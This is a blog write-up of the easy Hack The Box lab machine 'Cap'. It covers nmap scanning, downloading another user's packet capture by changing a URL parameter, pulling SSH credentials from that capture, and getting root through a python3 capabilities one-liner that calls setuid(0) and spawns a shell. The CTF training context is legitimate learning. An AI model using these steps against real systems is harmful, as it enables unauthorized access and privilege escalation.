Press "Enter" to skip to content

HTB Walkthrough : Cap

pentestsky

Last updated on October 1, 2021

Today we come with another challenge from Hackthebox called cap . This is easy level machine in which non encrypted traffic was going on and using Wireshark we analyze the traffic .So without wasting time let start the machine.

Level : Easy

Attacking Strategy

  • Network Scanning
    • Nmap
  • Enumeration
    • PCAP dump
    • Analyze pcap file
    • extract Credentials from pcap file
  • Privilege Escalation
    • Abusing capabilities

Walkthrough

IP Address : 10.10.10.245

We start with nmap scan with default -sC script and -sV version scanning to perform the banner grabbing on server . Nmap reveals some service and ports are open on target like port 21 FTP , port 22 SSH, Port 80 HTTP.

nmap -sC -sV -p- 10.10.10.245
Nmap scan report for 10.10.10.245
Host is up (0.11s latency).
Not shown: 65463 filtered ports, 69 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|_  256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519)
80/tcp open  http    gunicorn
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 404 NOT FOUND
|     Server: gunicorn
|     Date: Fri, 20 Aug 2021 16:22:54 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 232
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
|     <title>404 Not Found</title>
|     <h1>Not Found</h1>
|     <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Server: gunicorn
|     Date: Fri, 20 Aug 2021 16:22:48 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 19386
|     <!DOCTYPE html>
|     <html class="no-js" lang="en">
|     <head>
|     <meta charset="utf-8">
|     <meta http-equiv="x-ua-compatible" content="ie=edge">
|     <title>Security Dashboard</title>
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <link rel="shortcut icon" type="image/png" href="/static/images/icon/favicon.ico">
|     <link rel="stylesheet" href="/static/css/bootstrap.min.css">
|     <link rel="stylesheet" href="/static/css/font-awesome.min.css">
|     <link rel="stylesheet" href="/static/css/themify-icons.css">
|     <link rel="stylesheet" href="/static/css/metisMenu.css">
|     <link rel="stylesheet" href="/static/css/owl.carousel.min.css">
|     <link rel="stylesheet" href="/static/css/slicknav.min.css">
|     <!-- amchar
|   HTTPOptions: 
|     HTTP/1.0 200 OK
|     Server: gunicorn
|     Date: Fri, 20 Aug 2021 16:22:48 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Allow: OPTIONS, GET, HEAD
|     Content-Length: 0
|   RTSPRequest: 
|     HTTP/1.1 400 Bad Request
|     Connection: close
|     Content-Type: text/html
|     Content-Length: 196
|     <html>
|     <head>
|     <title>Bad Request</title>
|     </head>
|     <body>
|     <h1><p>Bad Request</p></h1>
|     Invalid HTTP Version 'Invalid HTTP Version: 'RTSP/1.0''
|     </body>
|_    </html>
|_http-server-header: gunicorn

On port 21 i.e FTP anonymous login is not available and this version is not exploitable directly,then we move on port 80 and start enumeration .After some time we got the information from profile like username “Nathan” , etc.

Enumeration

The landing page have one more functionality for taking the snapshot for analysis .we download the some pcap file for analysis. Now we start enumerating the file and start enumeration about services or any other details. After some time we simply try to get 0.pcap file by changing URL parameter .

0.pcap file have lot of protocols like HTTP, etc . Pcap file is long to understand so we filter the information according the need.After giving sometime we got the credentials. so we simply ssh the service and it worked.

Privilege Escalation

From these credential we ssh to the server. Now its time to get the root, so we start with manual enumeration like checking passwd file , SUID Bit, etc.

Username : nathan

Password : Buck3tH4TF0RM3!

Username and Password from PCAP file

After some time we get to know that we can abuse the capabilities i.e we can use python to abuse, GTFOBins show how to abuse the capabilities . After successful exploitation we got the root and collect the flags .

getcap -r / 2>/dev/null
python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'

Leave a Reply

Your email address will not be published.

This site uses Akismet to reduce spam. Learn how your comment data is processed.